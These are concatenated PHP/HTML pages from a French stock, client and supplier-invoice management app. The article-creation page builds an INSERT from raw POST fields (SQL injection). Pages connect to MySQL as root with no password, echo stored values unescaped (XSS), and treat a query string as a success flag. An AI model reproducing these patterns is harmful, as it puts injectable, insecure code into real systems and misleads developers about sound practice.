$desc_court = $_POST['desc_court'];
$desc_long = $_POST['desc_long'];
$poids = $_POST['poids'];
$prix_achat_ht = $_POST['prix_achat_ht'];
$prix_vente_ht = $_POST['prix_vente_ht'];
$prix_vente_ttc = $_POST['prix_vente_ttc'];
$stock_minima = $_POST['stock_minima'];
$stock_reel = $_POST['stock_reel'];
$images = $_POST['images'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_article = "INSERT INTO `article`(`idarticle`, `idfamillearticle`, `idsousfamillearticle`, `idfournisseur`, `ref_fournisseur`, `ref_interne`, `desc_court`, `desc_long`, `date_debut`, `date_fin`, `num_serie`, `poids`, `duree_garantie`, `stock_minima`, `stock_reel`, `code_barre`, `prix_achat_ht`, `prix_vente_ht`, `prix_vente_ttc`, `images`)
VALUES ('','$idfamillearticle','$idsousfamillearticle','$idfournisseur','$ref_fournisseur','$ref_interne','$desc_court','$desc_long','$date_debut','$date_fin','$num_serie','$poids','$duree_garantie','$stock_minima','$stock_reel','$code_barre','$prix_achat_ht','$prix_vente_ht','$prix_vente_ttc','$images')";
mysql_query($sql_article);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Article</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Nouvel Article</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ARTICLE - <span class="semi-bold">Nouvel Article</span></h3>
</div>
<?php
if($sql_article == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> L'article <b><?php echo $designation; ?></b> a été créé avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_article == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une erreur de type <b><?php echo $error; ?></b> s'est produite. Vérifiez votre code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php" class="active">Client</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Donnée - <span class="semi-bold">Client</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Clients</span> <a href="nouv.client.php"><button class="btn btn-primary btn-xs btn-mini" type="button">Nouveau Client</button></a></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID client</th>
<th>Identité</th>
<th>Adresse</th>
<th>Téléphone</th>
<th>Adresse Mail</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
$sql_client = mysql_query("SELECT * FROM client");
while($donnee_client = mysql_fetch_array($sql_client))
{
?>
<tr class="odd gradeX">
<td>
<?php
if($donnee_client['nom'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['prenom'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['adresse1'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['cp'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['ville'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['tel'] == ""){echo "<i class='fa fa-exclamation'></i>";}
if($donnee_client['mail'] == ""){echo "<i class='fa fa-exclamation'></i>";}
?>
CLT000<?php echo $donnee_client['idclient']; ?></td>
<td>
<?php
if($donnee_client['civilite'] == 1){echo "M.";}
if($donnee_client['civilite'] == 2){echo "Mme.";}
if($donnee_client['civilite'] == 3){echo "Mlle.";}
if($donnee_client['civilite'] == 4){echo "Entreprise";}
if($donnee_client['civilite'] == 5){echo "SARL.";}
if($donnee_client['civilite'] == 6){echo "SA.";}
if($donnee_client['civilite'] == 7){echo "EURL.";}
if($donnee_client['civilite'] == 8){echo "SAS.";}
?>
<?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?><br><br>
<i>Raison Sociale:<br>
<?php
if($donnee_client['raison_social'] == ""){echo "<b>Particulier</b>";}else{echo "<b>".$donnee_client['raison_social']."</b>";}
?>
</i>
</td>
<td>
<?php echo $donnee_client['adresse1']; ?><br>
<?php echo $donnee_client['adresse2']; ?><br>
<?php echo $donnee_client['cp']; ?> <?php echo $donnee_client['ville']; ?>
</td>
<td class="center">
Tel: <?php echo $donnee_client['tel']; ?><br>
Fax: <?php echo $donnee_client['fax']; ?><br>
Port: <?php echo $donnee_client['port']; ?>
</td>
<td class="center"><?php echo $donnee_client['mail']; ?></td>
<td class="center">
<a href="modif.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-paste"></i> Editer</button></a>
<a href="fiche.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Client</button></a>
<a href="supp.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php" class="active">Article</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Donnée - <span class="semi-bold">Article</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Article</span> <a href="nouv.article.php"><button class="btn btn-primary btn-xs btn-mini" type="button">Nouvel Article</button></a></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID article</th>
<th>Visuel</th>
<th>Désignation</th>
<th>Prix Vente TTC</th>
<th>Stock</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<tr class="odd gradeX">
<td><?php echo "ART000".$donnee_article['idarticle']; ?><br><?php echo $donnee_article['ref_interne']; ?></td>
<td><img width="150px" height="115px" src="<?php echo $donnee_article['images']; ?>" /></td>
<td><?php echo $donnee_article['desc_court']; ?></td>
<td><?php echo $donnee_article['prix_vente_ttc']; ?> €</td>
<td>
<?php
if($donnee_article['stock_reel'] > 1){echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='En Stock' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-green.png' /></button>";}
elseif($donnee_article['stock_reel'] == 1) {echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='A Commander' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-warning.png' /></button>";}
elseif($donnee_article['stock_reel'] < 1 ) {echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='RUPTURE' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-danger.png' /></button>";}
?>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="myModal" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i class="icon-credit-card icon-7x"></i>
<h4 class="semi-bold" id="myModalLabel">Information de Stock</h4>
<br>
</div>
<div class="modal-body">
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-green.png" />: <b>EN STOCK</b><br><p>Le stock de Produit est supérieur au minima de commande du dit produit. <u>Aucune commande nécessaire</u>.</p><br><br>
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-warning.png" />: <b>STOCK BAS</b><br><p>Le Produit est encore en stock mais il est soit réservé ou pratiquement en rupture. <u>Commande Nécessaire</u>.</p><br><br>
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-danger.png" />: <b>RUPTURE</b><br><p>Le produit n'est plus en stock, soit il est directemet en rupture chez le fournisseur ou une commande est nécessaire. <u>Commande nécessaire</u>.</p>
</div>
<div class="modal-footer">
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</td>
<td>
<a href="modif.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-paste"></i> Editer</button></a>
<a href="fiche.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Article</button></a>
<a href="supp.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-mixitup/jquery.mixitup.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/messages_notifications.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/search_results.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_liv_poss = date('d-m-Y', strtotime("+2 days"));
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php" class="active">FACTURE</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">FACTURE</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Facture Fournisseur</span></h4>
<a href="nouv.facture.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouvelle Facture</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Facture</th>
<th>Date de la facture</th>
<th>Fournisseur</th>
<th>Prix Total TTC</th>
<th>Action</th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_fact_four = mysql_query("SELECT * FROM fact_four, fournisseur WHERE fact_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_fact_four = mysql_fetch_array($sql_fact_four))
{
?>
<tr class="odd gradeX">
<td>FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></td>
<td><?php echo $donnee_fact_four['date_fact_four']; ?></td>
<td><?php echo $donnee_fact_four['raison_social']; ?></td>
<td><?php echo $donnee_fact_four['ptttc_fact_four']; ?> €</td>
<td>
<a href="fiche.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Facture</button></a>
<a href="supp.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button></a>
<a href="reg.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-danger btn-cons" type="button"><i class="fa fa-credit-card"></i> Reglement</button></a>
</td>
<td HIDDEN>
<?php
switch($donnee_fact_four['etat_fact_four'])
{
case 1:
echo "<p class='text-info'>Facture Edité</p>";
break;
case 2:
echo "<p class='text-warning'>Facture en attente de paiement</p>";
break;
case 3:
echo "<p class='text-warning'>Facture partiellement Payé</p>";
break;
case 4:
echo "<p class='text-succes'>Facture payé</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
session_start();
if (!isset($_SESSION['login'])) {
header ('Location: login.php');
exit();
}
include ('config.php');
$result = mysql_query("SELECT iduser,login,images,nom,prenom,place FROM membre WHERE login = '".$_SESSION['login']. "'") or die(mysql_error());
$donnees_login = mysql_fetch_array($result);
?>
<!DOCTYPE html>
<html>
<head>
<title>LSI - GESTION COMMERCIALE</title>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<link href="<?php echo $rootsite; ?>assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-slider/css/jquery.sidr.light.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/css/datepicker.css" rel="stylesheet" type="text/css" />
<link href="<?php echo $rootsite; ?>assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/css/jquery.dataTables.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/css/datatables.responsive.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.css" rel="stylesheet" type="text/css"/>
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrap-slider/css/slider.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-slider/css/jquery.sidr.light.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-superbox/css/style.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END PLUGIN CSS -->
<!-- BEGIN CORE CSS FRAMEWORK -->
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<!-- END CORE CSS FRAMEWORK -->
<!-- BEGIN CSS TEMPLATE -->
<link href="<?php echo $rootsite; ?>assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<!-- END NEED TO WORK ON -->
</head>
<body class="">
<!-- BEGIN HEADER -->
<div class="header navbar navbar-inverse">
<!-- BEGIN TOP NAVIGATION BAR -->
<div class="navbar-inner">
<!-- BEGIN NAVIGATION HEADER -->
<div class="header-seperation">
<!-- BEGIN MOBILE HEADER -->
<ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none">
<li class="dropdown">
<a id="main-menu-toggle" href="#main-menu" class="">
<div class="iconset top-menu-toggle-white"></div>
</a>
</li>
</ul>
